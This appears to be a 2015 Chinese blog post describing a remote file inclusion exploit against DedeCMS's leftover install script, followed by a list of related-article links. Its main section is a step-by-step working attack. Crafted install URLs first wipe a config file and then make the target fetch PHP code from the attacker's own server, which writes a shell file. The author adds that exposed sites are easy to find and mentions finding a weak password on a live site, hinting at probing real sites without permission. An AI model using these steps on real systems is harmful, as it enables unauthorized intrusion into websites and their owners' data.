Web渗透学习-织梦CMS-RFI

原创 2015年07月09日 15:18:19

今天学习了exploit-db上面的一个漏洞,是织梦CMS最新版本的RFI(远程文件包含)。

织梦CMS最新版本的安装文件中仍然采用覆盖变量的方式更新系统,并且存在一些关键变量存储更新系统的路径信息,因此可以通过覆盖变量的方式来获取shell。

大致可以分为三步:


1.清空/data/config_update.php中的信息。

http://127.0.0.1/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=../data/admin/config_update.php

2.自己开一台服务器,假设是192.168.3.162,在服务器中写一个简单的脚本(但是不能保存成php类型)。

$ifconfig en0
$mkdir "dedecms"
$cd dedecms
$echo "<?php phpinfo();?>" > demodata.a.txt
$python -m SimpleHTTPServer


3.获取shell。

http://127.0.0.1/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://192.168.3.162:8000/


接下来可以验证一下,访问hello.php就好。

http://127.0.0.1/install/hello.php




漏洞原理不难,但是想发现还是不容易的。而且这个漏洞仅限于一般用户(因为install属于安装后可以删除的文件夹),但是在实际找的时候还是发现很多网站没有删除。

还没有找真正的网站去试,不过却偶然发现了一个弱口令,希望能获得一枚乌云账号吧~

---------------------------

更新:这个漏洞还是很好找网站的~随便那么一找就找到啦

版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

解决织梦CMS后台验证码不正确的四种方法

解决织梦CMS后台验证码不正确的四种方法 快速解决验证码不正确问题的思路,可以分类两类:1:取消掉验证码,直接登录。2:修复验证码,回复验证码功能。dedemcs模版 4种处理办法: ...

织梦CMS v5.7 完美实现导航条下拉二级菜单

转载请标明是引用于 http://blog.csdn.net/chenyujing5678  欢迎拍砖!   一、引言 好多人都问,织梦的下拉导航怎么做呢?其实很简单!即使你对代码一点也不...

安装dede cms 遇到的问题及解决办法,(织梦官方你是放弃这个产品了吗?)

DEDE CMS版本: dede_V5_6_UTF8 安装过程中出现: 8a4773468b800900dcfefbc5988833ed.xml 不存在或不可读! 原因:缺少模块文件...

DedeCMS自学教程5、织梦CMS顶部添加横向登录框

DedeCMS自学教程5、织梦CMS顶部添加横向登录框 DedeCMS自学教程5、顶部添加横向导航。本节以DedeCMS默认风格为例,所以,如果你站点使用的不是默认模板,要灵活修改。 ...

织梦CMS5.7版自动给图片添加alt属性的方法

搜素引擎看不懂图片,通过给图片添加alt属性,有助于搜索引擎判了解这是一张什么图片,利于搜索引擎优化,在SEO优化中,图片ALT属性描述很重要,图片alt属性就是对图片进行描述的文字。描述中可以加入网...

DedeCMS自学教程13:织梦CMS站点文档存放路径url优化设置

DedeCMS调用指定栏目不包含下级栏目的问题 DedeCMS自学教程13:织梦CMS站点文档存放路径url优化设置 DedeCMS自学教程13:织梦CMS站点文档存放路径url优化设置 ...

解决织梦CMS后台验证码不正确的四种方法

DedeCMS文章里图片ALT注释自动填充为文章标题 解决织梦CMS后台验证码不正确的四种方法 快速解决验证码不正确问题的思路,可以分类两类:1:取消掉验证码,直接登录。2:修复验证码,回...

简单解决织梦CMS提示“系统无此标签,可能已经移除”的方法

织梦因为操作简单,上手易受到很多人的喜欢,不过织梦的问题也不少,不知道你们有没有遇到“系统无此标签,可能已经移除”这个问题。今天就跟大家分享出现这个错误提醒的两种情况和解决办法。

灯鹭织梦CMS插件安装与介绍

Hi~~  织梦CMS的站长们,大家好!社会化登录,灯鹭织梦CMS插件终于和大家见面了,下面向大家介绍下灯鹭织梦CMS插件安装的方法。有问题欢迎加入我们的灯鹭织梦CMS QQ群:168970833  ...
  • kacoro
  • kacoro
  • 2011-11-03 09:45
  • 1276

织梦DedeCMS正式发布5.7版 老牌CMS再发力

织梦DedeCMS正式发布5.7版 老牌CMS再发力 2011-03-09 11:28 [小 大] 来源: 站长之家Chinaz.com 评论: 0 转发至: 站长交易(http:/...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)